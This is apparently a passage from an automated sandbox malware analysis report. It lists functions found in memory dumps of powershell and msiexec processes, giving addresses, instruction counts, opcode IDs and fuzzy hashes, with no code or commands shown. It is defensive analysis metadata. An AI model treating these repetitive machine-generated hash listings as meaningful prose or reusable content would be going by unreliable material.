                                                                                                                                            • Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1a210a492d3ef80d9daa31b6ca45b7ecc96db0cf05740f822c6b68133a725f28
                                                                                                                                            • Instruction ID: bc40d9ec2614bea96e503d58c23e04c1d102ec377fd654f1200a6f90d0e7f2cb
                                                                                                                                            • Opcode Fuzzy Hash: 1a210a492d3ef80d9daa31b6ca45b7ecc96db0cf05740f822c6b68133a725f28
                                                                                                                                            • Instruction Fuzzy Hash: C7510974A00219EFDB05DF98C884AEEBBB2FF88714F248559E404AB365C735AD85CB90
                                                                                                                                            Function 09A81490 Relevance: .1, Instructions: 116COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: aef86a2df666e5f2e04f5ed1f678f8f8ecc8f92fd0d4d7668f6b8ec4b4df7ad2
                                                                                                                                            • Instruction ID: 7e430d360949dbd9e2ec70d85cda493139892b48d77eab26e70a6090b6056517
                                                                                                                                            • Opcode Fuzzy Hash: aef86a2df666e5f2e04f5ed1f678f8f8ecc8f92fd0d4d7668f6b8ec4b4df7ad2
                                                                                                                                            • Instruction Fuzzy Hash: 62410A74A056099FCB19DF9CC9849EEB7B2FF88310B258259E815EB354D735EC41CB90
                                                                                                                                            Function 09A82417 Relevance: .1, Instructions: 115COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7b9701564c69bf1d699a29c02047138874b0a39e7158711f165e56148d5a8b7a
                                                                                                                                            • Instruction ID: 87d20c87df3df20905badc7849127ad187d1bbed2a9971b7fd5af7666db4f9df
                                                                                                                                            • Opcode Fuzzy Hash: 7b9701564c69bf1d699a29c02047138874b0a39e7158711f165e56148d5a8b7a
                                                                                                                                            • Instruction Fuzzy Hash: 3D412B74A011099FCB09DF98C894AEEB7B1FF88714F248658E925EB3A5C335EC41CB90
                                                                                                                                            Function 09A80B30 Relevance: .1, Instructions: 114COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 51aa1b802a5f9213ea2f9db9ce1cf3ab3a70d75451cb0d1e494e189463289e56
                                                                                                                                            • Instruction ID: 5282f5ecc38307124326ec6bca3d967d786e2079cb3263fe0bd9a579a178da74
                                                                                                                                            • Opcode Fuzzy Hash: 51aa1b802a5f9213ea2f9db9ce1cf3ab3a70d75451cb0d1e494e189463289e56
                                                                                                                                            • Instruction Fuzzy Hash: 7E41E170A04209CFCB15DF58C498AEAFBB5FF89710B15819AE444EB351C335EC49CB90
                                                                                                                                            Function 09A81E57 Relevance: .1, Instructions: 113COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ec9c5ef519afd25da92a5864812f0b9d19c1eddce23bcbb68ab08bb7fbca1c6f
                                                                                                                                            • Instruction ID: 70f4eda0b8d36e26c2ad1b73db400b1bdc5d38ff619ec065c5fe08317771338e
                                                                                                                                            • Opcode Fuzzy Hash: ec9c5ef519afd25da92a5864812f0b9d19c1eddce23bcbb68ab08bb7fbca1c6f
                                                                                                                                            • Instruction Fuzzy Hash: 1D410A70A006099FCB05DF98C884AEEB7F2FF88314B248269E915EB364D735EC51CB90
                                                                                                                                            Function 04DC2BB0 Relevance: .1, Instructions: 110COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2011445193.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_4dc0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 84b2c540247573d5a4eb7efb44c143425773d3ca6f2fbff21161d9b819ddc365
                                                                                                                                            • Instruction ID: d0883bc175ddc5d9940e0c95f5fa6fd2e45a3e803c331faac3d96c01a0cc3fd8
                                                                                                                                            • Opcode Fuzzy Hash: 84b2c540247573d5a4eb7efb44c143425773d3ca6f2fbff21161d9b819ddc365
                                                                                                                                            • Instruction Fuzzy Hash: CF414974A0060A9FCB05CF58C594AEEF7B2FF48314B158599D806AB364C736FC90CBA0
                                                                                                                                            Function 07D27C60 Relevance: .1, Instructions: 102COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f62ad830bebcb37e0f76ac715938e85bb64368c5001ec62639e83287e22bc59a
                                                                                                                                            • Instruction ID: a81733e68743538818d9955a343ba068b848274d901877ad4eaa539fbf289c77
                                                                                                                                            • Opcode Fuzzy Hash: f62ad830bebcb37e0f76ac715938e85bb64368c5001ec62639e83287e22bc59a
                                                                                                                                            • Instruction Fuzzy Hash: DB3181B4B00214DBEB14E7A5D850FAFB6A3AFC5714F248415E9017F791CF769C828BA1
                                                                                                                                            Function 07D28C9C Relevance: .1, Instructions: 98COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8f689fff4605f14f2d89b2012f59b21baf458d65993534bb1c3bb3e42be821c6
                                                                                                                                            • Instruction ID: a50b0816d3a5dcfba2dae218791462b6dadf2df2033774c631ffcc69e8d71353
                                                                                                                                            • Opcode Fuzzy Hash: 8f689fff4605f14f2d89b2012f59b21baf458d65993534bb1c3bb3e42be821c6
                                                                                                                                            • Instruction Fuzzy Hash: E4319CF1304322DFDB14966484107B6F7529FE1219F1884AAD5428B690EB35C887F3A1
                                                                                                                                            Function 07D24420 Relevance: .1, Instructions: 94COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 524a956ea7c327932757cddd006c6e1a57afdf99d58c5ee4afeab1669610a818
                                                                                                                                            • Instruction ID: 54fcec14497177ef3f97637c31a55cce7f13229fb21a33341664ba8b18c72748
                                                                                                                                            • Opcode Fuzzy Hash: 524a956ea7c327932757cddd006c6e1a57afdf99d58c5ee4afeab1669610a818
                                                                                                                                            • Instruction Fuzzy Hash: 93217DB13143A29FEB3496AA8C00B37F69A9BD1619F24842ADD45DB381DDB6CC43D371
                                                                                                                                            Function 09A91226 Relevance: .1, Instructions: 91COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032543720.0000000009A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A90000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a90000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7022765ff29444d9ef13e5d451fde5549ec6f99aa3fbb4ea0ed62dca3f55c4ae
                                                                                                                                            • Instruction ID: 252d18b0b414e93371daa01cb25a8ba97b2e0ef6d563f9d4b84b0afed98d4009
                                                                                                                                            • Opcode Fuzzy Hash: 7022765ff29444d9ef13e5d451fde5549ec6f99aa3fbb4ea0ed62dca3f55c4ae
                                                                                                                                            • Instruction Fuzzy Hash: 02214871A28302DBDFA0AF65850177B76F9BB80E44F054079EC10EBA40FB39D980C3A1
                                                                                                                                            Function 09A931B2 Relevance: .1, Instructions: 74COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032543720.0000000009A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A90000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a90000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e75688b4ac2b1eb5bb0b3ef61080124b0915acc4c1e864da0480d7e064ebcf77
                                                                                                                                            • Instruction ID: cb9c971a84a021c7ae064e5e9b2659cc6573a0855ae6672c66f03eeceb5fcdc9
                                                                                                                                            • Opcode Fuzzy Hash: e75688b4ac2b1eb5bb0b3ef61080124b0915acc4c1e864da0480d7e064ebcf77
                                                                                                                                            • Instruction Fuzzy Hash: EF218B32B142268FDF2997A998511FAB7F9FB95690F20C47BD542C7142DF31C406C352
                                                                                                                                            Function 07D2440D Relevance: .1, Instructions: 73COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d5ef7ca8c1ba765e7f4cd1d487e561b2a4aa24085eaa57e621152727a91ebb2d
                                                                                                                                            • Instruction ID: 94a1d58b2f158a90fcf906828c7c346d510349ad3e398a29004412d137e611dc
                                                                                                                                            • Opcode Fuzzy Hash: d5ef7ca8c1ba765e7f4cd1d487e561b2a4aa24085eaa57e621152727a91ebb2d
                                                                                                                                            • Instruction Fuzzy Hash: 7F1159F130C3E2AFEB3146654800B76BBA54F92A08F284056ED949B682D9B5CC87D371
                                                                                                                                            Function 07D23DEB Relevance: .1, Instructions: 68COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6ca5af7b27e34dba779632dc4fae292d8b0588715ac13fae8b3ef793d9165d51
                                                                                                                                            • Instruction ID: 038f0a3db1b1af1a409a2cac5b68a88001689ef30c883aacfbd42adeb30b9434
                                                                                                                                            • Opcode Fuzzy Hash: 6ca5af7b27e34dba779632dc4fae292d8b0588715ac13fae8b3ef793d9165d51
                                                                                                                                            • Instruction Fuzzy Hash: A521D8F6E0023AEFCF219E95D5401AAF7B0BF68214B194666DC59F7205D338D907DBA0
                                                                                                                                            Function 04DCFF28 Relevance: .0, Instructions: 50COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2011445193.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_4dc0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6ba4a1958ee5207ac1991e74b24ace5b2c8948a3d1a6433844e40f2e37c6c321
                                                                                                                                            • Instruction ID: 36ff1670e29352e5a4ad47013b094d30309898353920d6028770c685c245aadb
                                                                                                                                            • Opcode Fuzzy Hash: 6ba4a1958ee5207ac1991e74b24ace5b2c8948a3d1a6433844e40f2e37c6c321
                                                                                                                                            • Instruction Fuzzy Hash: 0D1116719003498FDB10DFAAC844BDEFBF5EF89720F24841AD419A7240CB79A544CFA4
                                                                                                                                            Function 09A80F94 Relevance: .0, Instructions: 48COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b7d16debc9042b595723dbdf38d7edd909ba56b3b4476ad255a363602a6e5f32
                                                                                                                                            • Instruction ID: fffa9a56e6f05782adaa25ba129f5f73e59cbbb16f32c47597f33c05af9776d9
                                                                                                                                            • Opcode Fuzzy Hash: b7d16debc9042b595723dbdf38d7edd909ba56b3b4476ad255a363602a6e5f32
                                                                                                                                            • Instruction Fuzzy Hash: 3F11DA34A00219EFDB05DF94D884EDDBBB2BF88714F28C559E405AB361C775AD85CB50
                                                                                                                                            Function 04DCA99B Relevance: .0, Instructions: 45COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2011445193.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_4dc0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d057179ebeed55d931d8cb2fd88bdb717320f42dab08fb7669b9ad9aa9409066
                                                                                                                                            • Instruction ID: 085bdf20504e565b9e378db157f444d217d91a80c5e6651fd3dec490ebc3a4f1
                                                                                                                                            • Opcode Fuzzy Hash: d057179ebeed55d931d8cb2fd88bdb717320f42dab08fb7669b9ad9aa9409066
                                                                                                                                            • Instruction Fuzzy Hash: 09014FB9B002199FDB00DB98D890AEDF771FF8E200B248159D95A9B361CB35EC43DB50
                                                                                                                                            Function 04DCF520 Relevance: .0, Instructions: 37COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2011445193.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_4dc0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8cecddc80e2873a83d41c006a5bd041990335dbeddc1dab8fef3d5f3bab267f8
                                                                                                                                            • Instruction ID: 4f92790a237a84bd814ed243841e7a85bdbebc7d95dad1d7c1aed1cc8ab97bd2
                                                                                                                                            • Opcode Fuzzy Hash: 8cecddc80e2873a83d41c006a5bd041990335dbeddc1dab8fef3d5f3bab267f8
                                                                                                                                            • Instruction Fuzzy Hash: FEF09039311A208B87056B29B01C46E77A7EBC8A66310421FEA06C7351EF34DC028BA5
                                                                                                                                            Function 07D24B85 Relevance: .0, Instructions: 25COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 917bf4d78b0d900d78106d64c935df6c76369fab6303a45f66fd764829883f94
                                                                                                                                            • Instruction ID: 551c59dbc802d8188ec6ac88a251d274837ca7541d4ef3223eca94dd9e95ae4c
                                                                                                                                            • Opcode Fuzzy Hash: 917bf4d78b0d900d78106d64c935df6c76369fab6303a45f66fd764829883f94
                                                                                                                                            • Instruction Fuzzy Hash: 0EF01C746092D2DFD7168B508850A51FF72AB93209B1981C6D9948F1A3C7768C87DB41
                                                                                                                                            Function 04DCFDD8 Relevance: .0, Instructions: 16COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2011445193.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_4dc0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                            • Instruction ID: 0779ee78385390e89c20a2d20ed4f3855a6e0f609b648a18c84db82ae7ec8dcb
                                                                                                                                            • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                            • Instruction Fuzzy Hash: 0ED06270D04209DF8780DFADC94156DFFF4EB59200F5085AE8919D7341F73196128BD1

                                                                                                                                            Executed Functions

                                                                                                                                            Function 02D5C146 Relevance: .2, Instructions: 232COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.2650283274.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2d50000_msiexec.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 69325a9ee1b07a87ee9680f2b89f9d162dff9e880df6b0b169b8f866351f2585
                                                                                                                                            • Instruction ID: 3a9d1108f74f9f9404bb8c011b025ddd93f415aef81ef73ed7bff5263201e578
                                                                                                                                            • Opcode Fuzzy Hash: 69325a9ee1b07a87ee9680f2b89f9d162dff9e880df6b0b169b8f866351f2585
                                                                                                                                            • Instruction Fuzzy Hash: 32A1C374E102189FEB14DFA9D884A9DBBF2FF89300F14806AE849AB365DB749D41CF54
                                                                                                                                            Function 02D5CCD8 Relevance: .2, Instructions: 188COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.2650283274.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2d50000_msiexec.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6f6c5324ddc4e65b3658d90269d5745d03b63d1110708ef060f1e0809b47105a
                                                                                                                                            • Instruction ID: 727893c723013ba3d70091195c10058278db0597a5bed7a9ac4f23e29d3118d1
                                                                                                                                            • Opcode Fuzzy Hash: 6f6c5324ddc4e65b3658d90269d5745d03b63d1110708ef060f1e0809b47105a
                                                                                                                                            • Instruction Fuzzy Hash: 7F81C374E00258CFDB18DFAAD844A9DBBF2BF89300F14806AD809AB365DB749D81CF50
                                                                                                                                            Function 02D5C468 Relevance: .2, Instructions: 187COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.2650283274.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2d50000_msiexec.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a812e90a32862a71b040a0807cee38bf2798d4b6e666638c2ecbe4093ded8baa
                                                                                                                                            • Instruction ID: b9dafc956b1ac0234e5d8f7edf82529352b0ecfa8b829d9ef3cf1eaa011605b5
                                                                                                                                            • Opcode Fuzzy Hash: a812e90a32862a71b040a0807cee38bf2798d4b6e666638c2ecbe4093ded8baa
                                                                                                                                            • Instruction Fuzzy Hash: 6781A374E10258DFDB14DFAAD884A9DBBF2BF88300F14806AD859AB365DB749D81CF50
                                                                                                                                            Function 02D55370 Relevance: .2, Instructions: 186COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.2650283274.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2d50000_msiexec.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 21d66ebb1cd23035a18f3e2b7f1859d2cb52a730d4d87977d2e192e20f065819
                                                                                                                                            • Instruction ID: 641d0ba8d4793dcd3a182335659d837726bd0780ff639c96505c92381a6cd08c
                                                                                                                                            • Opcode Fuzzy Hash: 21d66ebb1cd23035a18f3e2b7f1859d2cb52a730d4d87977d2e192e20f065819
                                                                                                                                            • Instruction Fuzzy Hash: CE81A174E00218CFDB19DFAAD844A9DBBF2BF89300F548069E809AB365DB749D81CF51
                                                                                                                                            Function 02D5C738 Relevance: .2, Instructions: 186COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.2650283274.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2d50000_msiexec.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 23b37dc3c95c94dd8996112e2f85670612978ae3da08e8a84fab87fe11733c43
                                                                                                                                            • Instruction ID: 87a9606faba2ae99e104196e907ec0300004f7c149da192fe36b9d11ea81bad9
                                                                                                                                            • Opcode Fuzzy Hash: 23b37dc3c95c94dd8996112e2f85670612978ae3da08e8a84fab87fe11733c43
                                                                                                                                            • Instruction Fuzzy Hash: 79819074E00218DFEB14DFAAD944B9DBBB2BF89300F14806AD859AB355DB749941CF50
                                                                                                                                            Function 02D5D278 Relevance: .2, Instructions: 185COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.2650283274.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2d50000_msiexec.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 15727a623e482383c63daa1c283ea83852a7f786669fcc82bcedb3e765af6843
                                                                                                                                            • Instruction ID: 6636e79a4effbcd4fa7cb4d2addbf403e1398293335b76f7397c3e3feece963f
                                                                                                                                            • Opcode Fuzzy Hash: 15727a623e482383c63daa1c283ea83852a7f786669fcc82bcedb3e765af6843
                                                                                                                                            • Instruction Fuzzy Hash: D481A474E00258CFEB18DFAAD884A9DBBF2BF89300F148069D859AB365DB749D41CF50
                                                                                                                                            Function 02D5CFA9 Relevance: .2, Instructions: 185COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.2650283274.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2d50000_msiexec.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 718ce6f3705fdb05a76be8880b4d7f55b6cd57dad2355e0e32855cab75817cd0
                                                                                                                                            • Instruction ID: d9bc774334d700a72c7e0ec863dd37d1814dc1a71ff145df7acef5d2c30effde
                                                                                                                                            • Opcode Fuzzy Hash: 718ce6f3705fdb05a76be8880b4d7f55b6cd57dad2355e0e32855cab75817cd0
                                                                                                                                            • Instruction Fuzzy Hash: 5A81A474E00258CFEB54DFAAD884A9DBBF2BF89310F148069E819AB365DB749D41CF50
                                                                                                                                            Function 02D5CA08 Relevance: .2, Instructions: 184COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.2650283274.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2d50000_msiexec.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6f14d51c7d32ddb2d41a26b01b9f76d81912235e38e872a8e19d2ca6f997aeb4
                                                                                                                                            • Instruction ID: 71512e9ad65763f3592f7946195de0ea10d2031e52c77dc8b16a0af49fee9917
                                                                                                                                            • Opcode Fuzzy Hash: 6f14d51c7d32ddb2d41a26b01b9f76d81912235e38e872a8e19d2ca6f997aeb4
                                                                                                                                            • Instruction Fuzzy Hash: C681A374E10618CFDB18DFAAD844A9DBBF2BF89300F14806AD819AB365DB749D81CF50
                                                                                                                                            Function 02D5E988 Relevance: .1, Instructions: 147COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.2650283274.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2d50000_msiexec.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fbfc47348cc5c4bf0828764fcbaaa179b474819662558a6610491db2fbe8a2ab
                                                                                                                                            • Instruction ID: fc90ad7d759920f4f4281defb714e1e239417918c4c8393c4133c7373465a62c
                                                                                                                                            • Opcode Fuzzy Hash: fbfc47348cc5c4bf0828764fcbaaa179b474819662558a6610491db2fbe8a2ab
                                                                                                                                            • Instruction Fuzzy Hash: 6D51A674E00218DFDB18DFAAD854A9DBBB2FF89300F248029E819AB364DB745D41CF54
                                                                                                                                            Function 02D50CA0 Relevance: 18.0, Strings: 14, Instructions: 539COMMON
